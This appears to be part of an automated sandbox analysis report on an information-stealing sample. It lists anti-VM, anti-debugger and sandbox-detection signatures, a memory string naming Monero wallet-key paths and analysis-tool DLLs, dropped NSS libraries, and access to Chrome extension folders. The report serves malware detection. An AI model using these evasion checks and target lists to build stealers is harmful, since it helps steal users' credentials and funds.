Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\file.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, MSBuild.exe	Binary or memory string: DIR_WATCH.DLL
Source: file.exe, MSBuild.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe, MSBuild.exe	Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

4_2_0040180D

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\file.exe	API coverage: 1.6 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 7.8 %
Source: C:\ProgramData\CBFCFBFBFB.exe	API coverage: 1.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6052	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4420	Thread sleep count: 78 > 30			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

4_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062735B FindFirstFileExW,	0_2_0062735B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	4_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	4_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	4_2_0040CD37
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B0735B FindFirstFileExW,	13_2_00B0735B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

4_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00410FBA GetSystemInfo,wsprintfA,

4_2_00410FBA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: BFCGDA.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: BFCGDA.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BFCGDA.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.0000000001373000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: BFCGDA.4.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: BFCGDA.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: BFCGDA.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(=7
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: BFCGDA.4.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: BFCGDA.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BFCGDA.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: BFCGDA.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: BFCGDA.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: BFCGDA.4.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: BFCGDA.4.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: BFCGDA.4.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BFCGDA.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: BFCGDA.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: BFCGDA.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: BFCGDA.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BFCGDA.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: BFCGDA.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BFCGDA.4.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006120AD VirtualProtect,LdrInitializeThunk,GetConsoleWindow,CloseHandle,SetCursorPos,

0_2_006120AD

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0061B5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0061B5E6

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

4_2_00418950

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061208F mov edi, dword ptr fs:[00000030h]	0_2_0061208F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00639362 mov eax, dword ptr fs:[00000030h]	0_2_00639362
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0063937A mov eax, dword ptr fs:[00000030h]	0_2_0063937A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00639385 mov eax, dword ptr fs:[00000030h]	0_2_00639385
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00650472 mov eax, dword ptr fs:[00000030h]	0_2_00650472
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00627EE8 mov eax, dword ptr fs:[00000030h]	0_2_00627EE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061EE9C mov ecx, dword ptr fs:[00000030h]	0_2_0061EE9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004014AD mov eax, dword ptr fs:[00000030h]	4_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040148A mov eax, dword ptr fs:[00000030h]	4_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004014A2 mov eax, dword ptr fs:[00000030h]	4_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00418599 mov eax, dword ptr fs:[00000030h]	4_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041859A mov eax, dword ptr fs:[00000030h]	4_2_0041859A
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF208F mov edi, dword ptr fs:[00000030h]	13_2_00AF208F
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AFEE9C mov ecx, dword ptr fs:[00000030h]	13_2_00AFEE9C
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B07EE8 mov eax, dword ptr fs:[00000030h]	13_2_00B07EE8

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0062A4E7 GetProcessHeap,

0_2_0062A4E7

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006174A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_006174A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061B5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0061B5E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006177C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006177C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00617952 SetUnhandledExceptionFilter,	0_2_00617952
